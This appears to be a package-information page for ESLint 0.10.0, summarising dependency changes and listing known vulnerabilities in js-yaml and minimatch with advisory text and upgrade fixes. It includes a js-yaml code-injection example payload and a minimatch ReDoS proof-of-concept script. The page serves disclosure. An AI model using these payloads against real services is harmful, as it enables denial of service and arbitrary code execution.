ESLint version 0.10.0 introduces subtle yet impactful changes compared to its predecessor, version 0.9.2. Primarily, the update brings improvements to the tooling and dependencies vital for development and testing. Most notably, the doctrine dependency sees an upgrade from version 0.5.2 to version 0.6.2. This likely incorporates bug fixes and potential enhancements in parsing JSDoc comments, ultimately impacting how ESLint understands and validates code documentation.
The devDependencies section also reveals shifts. Version 0.10.0 incorporates npm-license at ^0.2.3, a tool used for verifying license compliance. The update signifies a commitment to managing open-source dependencies effectively. The release date also indicates a month between the releases, meaning more stability, bug fixes and potentially new features. While the core functionality of ESLint, such as its Esprima-based pattern checking, remains consistent, these dependency adjustments ensure a more robust and up-to-date development environment for those contributing to or extending ESLint's capabilities. For developers actively using ESLint, this upgrade translates to more reliable JSDoc parsing and better license management within their projects, ensuring code quality and legal compliance. The move to 0.10.0 can be seen as incremental improvement to the infrastructure of the linter.
All the vulnerabilities related to the version 0.10.0 of the package
Denial of Service in js-yaml
Versions of js-yaml prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources leading to a Denial of Service.
Upgrade to version 3.13.0.
Code Injection in js-yaml
Versions of js-yaml prior to 3.13.1 are vulnerable to Code Injection. The load() function may execute arbitrary code injected through a malicious YAML file. Objects that have toString as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the load() function. The safeLoad() function is unaffected.
An example payload is
{ toString: !<tag:yaml.org,2002:js/function> 'function (){return Date.now()}' } : 1
which returns the object
{
"1553107949161": 1
}
Upgrade to version 3.13.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.